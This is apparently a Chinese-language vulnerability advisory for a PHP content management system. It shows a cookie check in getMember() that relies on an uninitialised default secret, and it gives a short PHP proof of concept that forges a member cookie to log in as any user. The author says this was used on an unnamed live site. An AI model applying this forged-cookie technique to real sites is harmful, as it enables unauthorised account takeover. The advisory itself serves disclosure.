- 发布时间:2016-08-08
- 公开时间:N/A
- 漏洞类型:权限绕过
- 危害等级:高
- 漏洞编号:xianzhi-2016-08-37389606
- 测试版本:N/A
漏洞详情
controllers\Common.php 行211
protected function getMember() {
if (get_cookie('member_id') && get_cookie('member_code')) {
$uid = (int)get_cookie('member_id');
$code = get_cookie('member_code');
if (!empty($uid) && $code == substr(md5(SITE_MEMBER_COOKIE . $uid), 5, 20)) {
$_memberinfo = $this->db->where('id', $uid)->get('member')->row_array();
$member_table = $this->membermodel[$_memberinfo['modelid']]['tablename'];
if ($member_table) {
$memberdata = $this->db->where('id', $uid)->get($member_table)->row_array();
if ($memberdata) {
$_memberinfo = array_merge($_memberinfo, $memberdata);
$this->memberedit = 1; //不需要完善会员资料
}
if ($this->memberconfig['uc_use'] == 1 && function_exists('uc_api_mysql')) {
$uc = uc_api_mysql('user', 'get_user', array('username'=> $_memberinfo['username']));
if ($uc != 0) {
$_memberinfo['uid'] = $uc[0];
}
}
return $_memberinfo;
}
}
}
return false;
}
可以看到 cookie的验证非常简单
if (!empty($uid) && $code == substr(md5(SITE_MEMBER_COOKIE . $uid), 5, 20)) {
由于SITE_MEMBER_COOKIE 在安装时未初始化 所以使用默认值SITE_MEMBER_COOKIE就可以伪造cookie以任意用户身份登录前台
POC:
$id='2';
echo substr(md5('2967e68d382902a' . $id), 5, 20);
还是网上找的例子:http://www.xxx.com/
成功登录uid=2的账号
QQ截图20180807211932.jpg
